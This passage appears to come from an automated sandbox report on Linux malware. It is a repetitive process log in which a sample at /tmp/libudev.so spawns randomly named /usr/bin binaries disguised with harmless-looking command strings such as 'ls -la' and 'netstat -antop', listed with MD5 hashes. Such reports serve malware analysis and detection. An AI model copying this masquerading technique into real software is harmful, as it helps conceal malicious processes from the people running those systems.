                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:50
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uijxdyxaco
                                                                                                                                          Arguments:/usr/bin/uijxdyxaco "ls -la" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:4f925977b7fa1d98ec538468e3547e28

                                                                                                                                          Start time:18:44:51
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uijxdyxaco
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:4f925977b7fa1d98ec538468e3547e28

                                                                                                                                          Start time:18:44:51
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:51
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:51
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uijxdyxaco
                                                                                                                                          Arguments:/usr/bin/uijxdyxaco who 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:4f925977b7fa1d98ec538468e3547e28

                                                                                                                                          Start time:18:44:51
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uijxdyxaco
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:4f925977b7fa1d98ec538468e3547e28

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/bnuowhwlvc
                                                                                                                                          Arguments:/usr/bin/bnuowhwlvc "netstat -antop" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:9731334739440e32b8e810ccddd96c17

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/bnuowhwlvc
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:9731334739440e32b8e810ccddd96c17

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/bnuowhwlvc
                                                                                                                                          Arguments:/usr/bin/bnuowhwlvc "ls -la" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:9731334739440e32b8e810ccddd96c17

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/bnuowhwlvc
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:9731334739440e32b8e810ccddd96c17

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/bnuowhwlvc
                                                                                                                                          Arguments:/usr/bin/bnuowhwlvc "netstat -antop" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:9731334739440e32b8e810ccddd96c17

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/bnuowhwlvc
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:9731334739440e32b8e810ccddd96c17

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/bnuowhwlvc
                                                                                                                                          Arguments:/usr/bin/bnuowhwlvc "ls -la" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:9731334739440e32b8e810ccddd96c17

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/bnuowhwlvc
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:9731334739440e32b8e810ccddd96c17

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:56
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/bnuowhwlvc
                                                                                                                                          Arguments:/usr/bin/bnuowhwlvc id 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:9731334739440e32b8e810ccddd96c17

                                                                                                                                          Start time:18:44:57
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/bnuowhwlvc
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:9731334739440e32b8e810ccddd96c17

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/chrcfbeejh
                                                                                                                                          Arguments:/usr/bin/chrcfbeejh ifconfig 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cd015ff5581523f795a9cdff85751e4e

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/chrcfbeejh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cd015ff5581523f795a9cdff85751e4e

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/chrcfbeejh
                                                                                                                                          Arguments:/usr/bin/chrcfbeejh "grep \"A\"" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cd015ff5581523f795a9cdff85751e4e

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/chrcfbeejh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cd015ff5581523f795a9cdff85751e4e

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/chrcfbeejh
                                                                                                                                          Arguments:/usr/bin/chrcfbeejh "cat resolv.conf" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cd015ff5581523f795a9cdff85751e4e

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/chrcfbeejh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cd015ff5581523f795a9cdff85751e4e

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/chrcfbeejh
                                                                                                                                          Arguments:/usr/bin/chrcfbeejh gnome-terminal 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cd015ff5581523f795a9cdff85751e4e

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/chrcfbeejh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cd015ff5581523f795a9cdff85751e4e

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/chrcfbeejh
                                                                                                                                          Arguments:/usr/bin/chrcfbeejh id 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cd015ff5581523f795a9cdff85751e4e

                                                                                                                                          Start time:18:45:02
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/chrcfbeejh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cd015ff5581523f795a9cdff85751e4e

                                                                                                                                          Start time:18:45:08
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:08
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:08
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hfdnmorvjd
                                                                                                                                          Arguments:/usr/bin/hfdnmorvjd "cd /etc" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:58cfbcd9b56c6de7ce40ba3c465cf465

                                                                                                                                          Start time:18:45:08
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hfdnmorvjd
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:58cfbcd9b56c6de7ce40ba3c465cf465

                                                                                                                                          Start time:18:45:08
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:08
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:08
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hfdnmorvjd
                                                                                                                                          Arguments:/usr/bin/hfdnmorvjd "sleep 1" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:58cfbcd9b56c6de7ce40ba3c465cf465

                                                                                                                                          Start time:18:45:08
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hfdnmorvjd
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:58cfbcd9b56c6de7ce40ba3c465cf465

                                                                                                                                          Start time:18:45:08
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:08
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:08
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hfdnmorvjd
                                                                                                                                          Arguments:/usr/bin/hfdnmorvjd bash 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:58cfbcd9b56c6de7ce40ba3c465cf465

                                                                                                                                          Start time:18:45:08
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hfdnmorvjd
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:58cfbcd9b56c6de7ce40ba3c465cf465

                                                                                                                                          Start time:18:45:08
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:08
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:08
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hfdnmorvjd
                                                                                                                                          Arguments:/usr/bin/hfdnmorvjd "grep \"A\"" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:58cfbcd9b56c6de7ce40ba3c465cf465

                                                                                                                                          Start time:18:45:09
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hfdnmorvjd
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:58cfbcd9b56c6de7ce40ba3c465cf465

                                                                                                                                          Start time:18:45:09
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:09
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:09
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hfdnmorvjd
                                                                                                                                          Arguments:/usr/bin/hfdnmorvjd whoami 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:58cfbcd9b56c6de7ce40ba3c465cf465

                                                                                                                                          Start time:18:45:09
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hfdnmorvjd
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:58cfbcd9b56c6de7ce40ba3c465cf465

                                                                                                                                          Start time:18:45:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mongquumqw
                                                                                                                                          Arguments:/usr/bin/mongquumqw bash 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:bd91d415d3d25aa31f7fa9f812b79548

                                                                                                                                          Start time:18:45:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mongquumqw
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:bd91d415d3d25aa31f7fa9f812b79548

                                                                                                                                          Start time:18:45:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mongquumqw
                                                                                                                                          Arguments:/usr/bin/mongquumqw who 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:bd91d415d3d25aa31f7fa9f812b79548

                                                                                                                                          Start time:18:45:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mongquumqw
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:bd91d415d3d25aa31f7fa9f812b79548

                                                                                                                                          Start time:18:45:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mongquumqw
                                                                                                                                          Arguments:/usr/bin/mongquumqw "netstat -antop" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:bd91d415d3d25aa31f7fa9f812b79548

                                                                                                                                          Start time:18:45:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mongquumqw
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:bd91d415d3d25aa31f7fa9f812b79548

                                                                                                                                          Start time:18:45:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mongquumqw
                                                                                                                                          Arguments:/usr/bin/mongquumqw "netstat -antop" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:bd91d415d3d25aa31f7fa9f812b79548

                                                                                                                                          Start time:18:45:15
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mongquumqw
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:bd91d415d3d25aa31f7fa9f812b79548

                                                                                                                                          Start time:18:45:15
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:15
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:15
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mongquumqw
                                                                                                                                          Arguments:/usr/bin/mongquumqw pwd 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:bd91d415d3d25aa31f7fa9f812b79548

                                                                                                                                          Start time:18:45:15
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mongquumqw
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:bd91d415d3d25aa31f7fa9f812b79548

                                                                                                                                          Start time:18:45:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hrrmkhkkhv
                                                                                                                                          Arguments:/usr/bin/hrrmkhkkhv "ifconfig eth0" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d3379066576970eab5be5293801f397c

                                                                                                                                          Start time:18:45:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hrrmkhkkhv
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d3379066576970eab5be5293801f397c

                                                                                                                                          Start time:18:45:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hrrmkhkkhv
                                                                                                                                          Arguments:/usr/bin/hrrmkhkkhv "echo \"find\"" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d3379066576970eab5be5293801f397c

                                                                                                                                          Start time:18:45:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hrrmkhkkhv
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d3379066576970eab5be5293801f397c

                                                                                                                                          Start time:18:45:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hrrmkhkkhv
                                                                                                                                          Arguments:/usr/bin/hrrmkhkkhv ls 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d3379066576970eab5be5293801f397c

                                                                                                                                          Start time:18:45:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hrrmkhkkhv
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d3379066576970eab5be5293801f397c

                                                                                                                                          Start time:18:45:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hrrmkhkkhv
                                                                                                                                          Arguments:/usr/bin/hrrmkhkkhv "route -n" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d3379066576970eab5be5293801f397c

                                                                                                                                          Start time:18:45:21
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hrrmkhkkhv
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d3379066576970eab5be5293801f397c

                                                                                                                                          Start time:18:45:21
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:21
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
